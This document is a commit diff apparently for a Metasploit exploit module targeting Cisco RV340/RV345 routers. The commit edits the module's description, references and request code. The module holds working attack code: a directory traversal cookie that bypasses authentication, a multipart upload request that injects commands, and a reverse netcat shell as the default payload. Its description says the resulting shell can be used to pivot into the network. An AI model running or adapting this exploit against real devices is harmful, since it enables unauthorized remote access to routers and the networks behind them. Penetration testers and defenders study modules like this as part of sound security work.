Update description and vulnerability listings. Cleaned up references. More randomization. Removed first unnecessary request in exploit portion of code. Added rescue section around json grabbing.
This commit is contained in:
parent
427c181e9a
commit
4b05ba6189
|
@ -17,29 +17,25 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
info,
|
||||
'Name' => 'Cisco RV34X Series Authentication Bypass and Command Injection',
|
||||
'Description' => %q{
|
||||
This module exploits a sessionid directory traversal authentication bypass, a sessionid
|
||||
improper input validation authentication bypass, and command injection on Cisco RV340 and
|
||||
RV345 Small Business Routers. All vulnerabilities were discovered by Bien Pham
|
||||
at Sea Security.
|
||||
|
||||
This module works on firmware versions 1.0.03.24 and below
|
||||
This module exploits two vulnerabilities, a session ID directory traversal authentication
|
||||
bypass (CVE-2022-20705) and a command injection vulnerability (CVE-2022-20707), on Cisco RV340 and RV345
|
||||
Small Business Routers, allowing attackers to gain remote shell access with www-data user privileges.
|
||||
This access can then be used to pivot to other parts of the network. This module works on firmware
|
||||
versions 1.0.03.24 and below.
|
||||
},
|
||||
'License' => MSF_LICENSE,
|
||||
'Platform' => ['Linux', 'Unix'],
|
||||
'Author' => [
|
||||
'Biem Pham', # Vulnerability Discoveries
|
||||
'Neterum', # Metasploit Module
|
||||
'jbaines-r7' # This metasploit module is heavily inspired from
|
||||
# cisco_rv_series_authbypass_and_rce.rb
|
||||
'jbaines-r7' # Inspired from cisco_rv_series_authbypass_and_rce.rb
|
||||
],
|
||||
'DisclosureDate' => '2021-11-02',
|
||||
'Arch' => [ARCH_CMD, ARCH_ARMLE],
|
||||
'References' => [
|
||||
[ 'URL', 'https://blog.security.sea.com/posts/pwn2own-2021-rv340/'], # Possibly down
|
||||
[ 'CVE', '2022-20705'], # Authentication Bypass
|
||||
[ 'CVE', '2022-20707'], # Command Injection
|
||||
[ 'ZDI', '22-409'], # Authentication Bypass
|
||||
[ 'ZDI', '22-410'], # Path Traversal leading to Authentication Bypass
|
||||
[ 'ZDI', '22-410'], # Authentication Bypass
|
||||
[ 'ZDI', '22-411'] # Command Injection
|
||||
],
|
||||
'Targets' => [
|
||||
|
@ -51,7 +47,8 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'Type' => :unix_cmd,
|
||||
'Payload' => {},
|
||||
'DefaultOptions' => {
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat'
|
||||
'PAYLOAD' => 'cmd/unix/reverse_netcat',
|
||||
'BadChars' => '\''
|
||||
}
|
||||
}
|
||||
],
|
||||
|
@ -110,26 +107,27 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
|
||||
if target['Type'] != :unix_cmd
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a 200 OK') unless res&.code == 200
|
||||
body_json = res.get_json_document
|
||||
fail_with(Failure::UnexpectedReply, 'The target did not respond with a JSON body') unless body_json
|
||||
begin
|
||||
body_json = res.get_json_document
|
||||
fail_with(Failure::NotFound, 'The target did not respond with a JSON body') unless body_json
|
||||
rescue JSON::ParserError => e
|
||||
print_error("Failed: #{e.class} - #{e.message}")
|
||||
return nil
|
||||
end
|
||||
end
|
||||
|
||||
print_good('Exploit successfully executed.')
|
||||
end
|
||||
|
||||
def send_exploit(cmd)
|
||||
user = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
pass = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
filename = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
fileparam = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
input = Rex::Text.rand_text_alphanumeric(5..12)
|
||||
|
||||
send_request_cgi({
|
||||
'encode_params' => false,
|
||||
'method' => 'POST',
|
||||
'uri' => '/jsonrpc',
|
||||
'data' => format('{"jsonrpc": "2.0", "method": "login", "params": {"user": "%<user>s", "pass": "%<pass>s"}}', user: user, pass: pass)
|
||||
})
|
||||
# sessionid utilized later needs to be set to length
|
||||
# of 16 or exploit will fail. Tested with lengths
|
||||
# 14-17
|
||||
sessionid = Rex::Text.rand_text_alphanumeric(16)
|
||||
|
||||
filepath = '/tmp/upload.input'
|
||||
pathparam = 'Configuration'
|
||||
|
@ -149,7 +147,7 @@ class MetasploitModule < Msf::Exploit::Remote
|
|||
'uri' => '/upload',
|
||||
'ctype' => "multipart/form-data; boundary=#{multipart_form.bound}",
|
||||
'headers' => {
|
||||
'Cookie' => 'sessionid =../../../etc/passwd; sessionid=aaaaaaaaaaaaaaaa'
|
||||
'Cookie' => 'sessionid =../../../etc/passwd; sessionid=' + sessionid
|
||||
},
|
||||
'data' => multipart_form.to_s
|
||||
}, 10)
|
||||
|
|
Loading…
Reference in New Issue